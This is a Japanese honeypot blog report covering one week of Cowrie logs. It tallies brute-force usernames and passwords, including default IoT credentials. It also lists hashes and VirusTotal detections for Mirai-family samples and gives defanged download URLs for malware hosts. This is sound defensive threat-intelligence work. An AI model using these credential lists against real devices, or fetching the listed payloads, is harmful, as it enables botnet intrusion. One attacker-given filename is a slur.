ハニーポットの観測記録

ハニーポッターすぎたむちのぶろぐ

ハニーポット観察記録【10】

Cowrie運用35日目の簡易報告です。

直近7日分の集計結果を公開します。

ダッシュボードと集計結果

ダッシュボード
※集計期間:2018/09/08~2018/09/15
f:id:SugitaMuchi:20180915112844p:plain f:id:SugitaMuchi:20180915120013p:plain ※map(event),pie(country),grahp(protocol)
※grahp(username),grahp(password)


■ログイン試行回数( username )
※集計期間:2018/09/08~2018/09/15
※ログ集計分
※上位10件

試行回数 username
2878 root
1389 admin
981 default
97 support
66 guest
64 telnetadmin
55 telecomadmin
47 user
39 telnet
36 e8telnet

■ログイン試行回数( password )
※集計期間:2018/09/08~2018/09/15
※ログ集計分
※上位10件

試行回数 password
551 password
449 default
320 (non pass)
271 admin
270 taZz@23495859
182 OxhlwSG8
161 vizxv
148 123456
143 ,ba234
134 xc3511

■ログイン試行回数( username / password )
※集計期間:2018/09/08~2018/09/15
※ログ集計分
※上位10件

試行回数 username / password
460 admin / password
303 root / taZz@23495859
292 default / default
260 admin / admin
201 root / default
199 default / OxhlwSG8
188 root / vizxv
184 root / (non pass)
160 admin / ,ba234
152 root / xc3511

ダウンロードされたマルウェアについて


■ダウンロードされたファイル
※集計期間:2018/09/08~2018/09/15

全部で44種類となりました。

(stdin): b33b30c3cc7e027320e4d203303cc36a4e84b44451278bbb524ec54d5f61a4d6: ASCII text, with very long lines
(stdin): b986a2795479b4aacf6dafa6654914ca11d9b4a260a35f1369e262f4e948e841: ELF 32-bit LSB executable, ARM, version 1, statically linked, stripped
(stdin): e52c66d71e50541d19c651353d481f21363f5674636ca0917b1d908777ee947d: ASCII text
(stdin): f6c1795623605f8543224ecb5b29fa336b5c80be48ed2f3690114b8e709780f1: POSIX shell script, ASCII text executable
.shinka.x86: 67f2ccf38f9de4a915f0445538353dc2ff1a397950783a7d025c231b3265b374: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
.shinka.x86: 6c6f0aa1e5aa53d116da6d1986f3a690e18c5b1f65344da67ba78dfb9705251e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
.shinka.x86: 9d43513c0714e9e1e5287a0889496e5577c751249c113f8da4b92902194cc7e3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
.shinka.x86: 9e6251101ea2345dbf493137195fb4ebe1a2ac8b07156c9fa43c6320c6a62710: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
8x868: 85efb26738828400bc6fcced4b173f3e718e90287e55c262adf6aa21e26216aa: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
BleedStreet.x86: 5bea1307348853717000ee7e342ed654650a4df83e058668f3abad2aa355be28: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: 21c01e4620e3d9ee371361b61291df6c652ac21cbd8ab4378753a76627839be8: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: 5d0356caa3e5c4ba59cf6fcc2e7a389a677df61c5643b36b7e8af9383b18c0a4: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: 8a33d0be8144a57b9d6ca32752ff369c2eab8eba68afc47af5c120b21c7790e3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: a8845f60705134da044737b675c835c71cb5227f74133badf5fcf7a2e3f4d216: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: b7a7a7078856e2f72867a1a648aed422edef0ba43caf1bc108028d17e6c40f35: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Josho.x86: c884357b1dde184825fbdc40bec947cef51214ead981c853b9d6f2e614c3335f: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
KEIJI.sh: c267da9c09ad1b3a7f975cc83cbf616b08ad1f38a4ce98bb7b9f4176e79b25f8: Bourne-Again shell script, ASCII text executable
Owari.x86: 2fef9a7c9499184ae82a5769a98d62bf9d87a89fb8b704af9b731517e9d791b2: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Owari.x86: 9c021013e3cc84f3d5c973fccb2375b557279d5398de7719dc0b07e19b8517c9: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Owari.x86: b96998410aa93bc0fd0edf954084603e0faa875a231225d4ec2cbad9ce86ba06: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
VMuXsHnwExtFaDtPptEA: 812f2280e5f6e260045cc7893252cdeff1de2a624345811cb273bcce3dbcc2aa: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
apep.x86: 63b6d3d31a6544ed9fada64750a86d17defe5f519fc5bd3cd38d8325a0eebab8: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
apep.x86: a448a8b8fd5a7fa0663132ef49e9ca779b87ba19098e1463c9fd833399467364: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
apep.x86: acf3d93bd1ab28ed4a7974fc87f65cf957b397e481c46774c67d99c56bb25a74: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
bins.sh: 856a9ddc67362b167bb12e1fd54741afb0d7da0537f3ca9cfe63463a21cd044a: POSIX shell script, ASCII text executable
gemini.x86: 33dbdfc373fb19891723842c468d8f3dc62f04573d63f3e9ebb9f7d2b93cb0bc: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
gemini.x86: c9e9deeada1d9f290619d097ec621974d43f7c5ad721b6aa07e636b759680128: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
hoderi.x86: b72252f224177cdf05247d29ebd9072f39e0ed82e3be4894a817378a0def56a6: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
hoho.x86: 069d2fd608b734b10a77abd43e416135778f9632fe09f6dc225c104df954c721: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
hoho.x86: 31b40737fc062be95dee8f31615a852d3e272e9f2a74974867868297f934cc46: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped
kohan.x86: 98ea5e44fbfaaabc35d1d8cebe6cfa715b49a278f604991067e984c1bb85390e: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
miori.x86: 12a4775fce7e59ce2a71e7f4de07debeba6e534e1c256870ca576cabbb35affd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
miori.x86: 58d2db0bc8d93a30101eb87ef28c7dbf1af61ae2ebc355f6a236ab594a236f4b: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
miori.x86: 8036b03dab8fa66d8727d75ffde5a8546c5d51da1b29d50eaaa12bdae1c6cec6: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
miori.x86: c65e5614b0d4c7df409c0c0c1f2072c5f4a138886f232cadd935df5b151b23c6: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
neko.x86: 170fa7be45644cb7d114864f92de96965ffc1ef574702a6689b551b625f53ef3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
nsfw.x86: 24ff67030f052b88e9ed60527aa7e415ca86175afa805253189bdd604b043117: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
nsfw.x86: 44efc8363b2af1e0afe7a989e1998808998e7e493cabf9ee4aced3b0e2a181ca: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
nsfw.x86: 753529554ce6b99d149c16d1732e28a9d1738d91d5a4ed462d66005763e25435: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
skid.x86: ef1da03ab39be91fd765ae491df3267890fcb051d8aabb9d17d2262cf185ccf0: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
telnet.sh: dc5c7e90d5e03bb48ee085bc647adf6887a56f9a8030dadb6c928d5e9fba140b: Bourne-Again shell script, ASCII text executable
w.sh: 337706eb90fbd0350469bfb251a184203549bfd353b387d86845feabceccde17: Bourne-Again shell script, ASCII text executable
x86.nigger: a183e78424bf562356959e396fe81a5d6eb2b3cdffd80c3945ce03102f1ccc2a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
x86.yakuza: ed0ce784f02a9378c8db4d3e7cef513f5fb0e722d01e03a42b849c3ff5755bf4: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

■検出状況
※テーブルにハッシュ値が収まらないので、省略してます。

filename sha256 VT検出状況 備考
(stdin) b33b30c3cc... 検出率: 27 / 58 Backdoor
(stdin) b986a27954... 検出率: 32 / 59 Backdoor
(stdin) e52c66d71e... 検出率: 7 / 58 Downloader
(stdin) f6c1795623... 検出率: 2 / 58 Downloader
.shinka.x86 67f2ccf38f... 検出率: 19 / 59 Mirai
.shinka.x86 6c6f0aa1e5... 検出率: 9 / 59 Mirai
.shinka.x86 9d43513c07... 検出率: 9 / 59 Mirai
.shinka.x86 9e6251101e... 検出率: 9 / 59 Mirai
8x868 85efb26738... - -
BleedStreet 5bea130734... 検出率: 28 / 59 Mirai
Josho.x86 21c01e4620... - -
Josho.x86 5d0356caa3... 検出率: 25 / 59 Mirai
Josho.x86 8a33d0be81... 検出率: 28 / 59 Mirai
Josho.x86 a8845f6070... 検出率: 26 / 59 Mirai
Josho.x86 b7a7a70788... 検出率: 26 / 59 Mirai
Josho.x86 c884357b1d... 検出率: 18 / 58 Mirai
KEIJI.sh c267da9c09... 検出率: 25 / 59 Mirai
Owari.x86 2fef9a7c94... 検出率: 24 / 58 Mirai
Owari.x86 9c021013e3... 検出率: 25 / 59 Mirai
Owari.x86 b96998410a... 検出率: 24 / 59 Mirai
VMuXsHnwExtFaDtPptEA 812f2280e5... 検出率: 14 / 59 Mirai
apep.x86 63b6d3d31a... 検出率: 8 / 59 Mirai / Hajime
apep.x86 a448a8b8fd... 検出率: 20 / 59 Mirai / Hajime
apep.x86 acf3d93bd1... 検出率: 11 / 58 Mirai / Hajime
bins.sh 856a9ddc67... 検出率: 17 / 59 Mirai
gemini.x86 33dbdfc373... 検出率: 23 / 59 Mirai
gemini.x86 c9e9deeada... 検出率: 21 / 58 Mirai
hoderi.x86 b72252f224... 検出率: 19 / 58 Mirai / Hajime
hoho.x86 069d2fd608... 検出率: 21 / 59 Mirai
hoho.x86 31b40737fc... 検出率: 24 / 59 Mirai
kohan.x86 98ea5e44fb... 検出率: 24 / 59 Mirai
miori.x86 12a4775fce... 検出率: 17 / 58 Mirai
miori.x86 58d2db0bc8... 検出率: 16 / 59 Mirai
miori.x86 8036b03dab... 検出率: 4 / 58 Mirai
miori.x86 c65e5614b0... 検出率: 14 / 59 Mirai
neko.x86 170fa7be45... 検出率: 17 / 59 Mirai
nsfw.x86 24ff67030f... 検出率: 17 / 59 Mirai
nsfw.x86 44efc8363b... 検出率: 22 / 59 Mirai
nsfw.x86 753529554c... 検出率: 16 / 59 Mirai
skid.x86 ef1da03ab3... 検出率: 12 / 59 Mirai
telnet.sh dc5c7e90d5... 検出率: 19 / 59 Mirai
w.sh 337706eb90... 検出率: 25 / 59 Mirai
x86.nigger a183e78424... 検出率: 11 / 59 Mirai
x86.yakuza ed0ce784f0... 検出率: 27 / 59 Mirai

※filenameが(stdin)のものは、標準入力から

※以下がhitしなかったので、VirusTotalにファイルをアップロードしました。

■アップロード前

filename sha256 VT検出状況 備考
8x868 85efb26738... - -
Josho.x86 21c01e4620... - -


■アップロード後

filename sha256 VT検出状況 備考
8x868 85efb26738... 検出率: 6 / 58 Gafgyt

www.virustotal.com

filename sha256 VT検出状況 備考
Josho.x86 21c01e4620... 検出率: 18 / 58 Mirai

www.virustotal.com


先週からHajimeっぽいのが混じり始めたのと、
今回は、標準出力からマルウェアのコードを入れ込もうとしてるのが
多く確認できました。

あと、上記含めて今週は4検体くらいVTの検索でヒットしなかったものを
アップロードしておきました。


■ダウンロードログ
※危険なので接続しないでください。

703 Downloaded URL (hxxp://159[.]65[.]232[.]56:80/bins/apep[.]x86)
292 Downloaded URL (hxxp://185[.]244[.]25[.]176:80/bins/gemini[.]x86)
163 Downloaded URL (hxxp://159[.]89[.]226[.]151:80/bins/VPNFilter[.]x86)
137 Downloaded URL (hxxp://185[.]244[.]25[.]165:80/AB4g5/Josho[.]x86)
123 Downloaded URL (hxxp://80[.]211[.]57[.]80:80/miori[.]x86)
108 Downloaded URL (hxxp://159[.]65[.]232[.]56:80/bins/hoderi[.]x86)
106 Downloaded URL (hxxp://104[.]248[.]56[.]235:80/AB4g5/Josho[.]x86)
105 Downloaded URL (hxxp://46[.]29[.]163[.]28:80/kohan[.]x86)
102 Downloaded URL (hxxp://159[.]203[.]163[.]26:80/Binarys/Owari[.]x86)
76 Downloaded URL (hxxp://209[.]141[.]42[.]153:80/bins/sora[.]x86)
67 Downloaded URL (hxxp://217[.]61[.]6[.]155:80/gaybub/miori[.]x86)
60 Downloaded URL (hxxp://103[.]60[.]15[.]2:80/Binarys/Owari[.]x86)
55 Downloaded URL (hxxp://159[.]89[.]183[.]176:80/AB4g5/Josho[.]x86)
48 Downloaded URL (hxxp://74[.]91[.]126[.]105/w[.]sh)
46 Downloaded URL (hxxp://195[.]181[.]218[.]107:80/bins/nsfw[.]x86)
39 Downloaded URL (hxxp://165[.]227[.]129[.]7:80/AB4g5/Josho[.]x86)
32 Downloaded URL (hxxp://46[.]17[.]40[.]236/KEIJI[.]sh)
27 Downloaded URL (hxxp://128[.]199[.]197[.]79:80/bins/[.]shinka[.]x86)
21 Downloaded URL (hxxp://46[.]29[.]160[.]250:80/bins/hoho[.]x86)
21 Downloaded URL (hxxp://206[.]189[.]144[.]202:80/bins/[.]shinka[.]x86)
20 Downloaded URL (hxxp://167[.]99[.]34[.]197:80/bins/x86[.]nigger)
14 Downloaded URL (hxxp://142[.]93[.]28[.]248:80/bins/hoho[.]x86)
14 Downloaded URL (hxxp://142[.]93[.]196[.]48/lod[.]sh)
13 Downloaded URL (hxxp://185[.]244[.]25[.]138:80/Binarys/Owari[.]x86)
10 Downloaded URL (hxxp://159[.]65[.]233[.]89:80/AB4g5/Josho[.]x86)
4 Downloaded URL (hxxp://128[.]199[.]197[.]79:80/bins/x86[.]skid)
4 Downloaded URL (hxxp://128[.]199[.]197[.]79:80/bins/skid[.]x86)
3 Downloaded URL (hxxp://159[.]89[.]183[.]176:80/vi/x86[.]yakuza)
2 Downloaded URL (hxxp://89[.]203[.]249[.]183:80/bins/owari[.]x86)
2 Downloaded URL (hxxp://80[.]211[.]112[.]95:80/bins/BleedStreet[.]x86)
1 Downloaded URL (hxxp://89[.]34[.]237[.]107/bins[.]sh)
1 Downloaded URL (hxxp://211[.]143[.]198[.]172:780/lvn3/eU)
1 Downloaded URL (hxxp://211[.]143[.]198[.]172:780/VMuXsHnwExtFaDtPptEA)
1 Downloaded URL (hxxp://206[.]189[.]172[.]75:80/neko[.]x86)
1 Downloaded URL (hxxp://178[.]128[.]249[.]30/bins[.]sh)
1 Downloaded URL (hxxp://168[.]235[.]82[.]212:80/bins/gemini[.]x86)
1 Downloaded URL (hxxp://159[.]89[.]154[.]52:80/8x868)
1 Downloaded URL (hxxp://159[.]203[.]163[.]26:80/AB4g5/Josho[.]x86)
1 Downloaded URL (hxxp://158[.]69[.]60[.]239/bins[.]sh)
1 Downloaded URL (hxxp://138[.]197[.]74[.]100/bins[.]sh)


今回は、こんな感じでした。
以上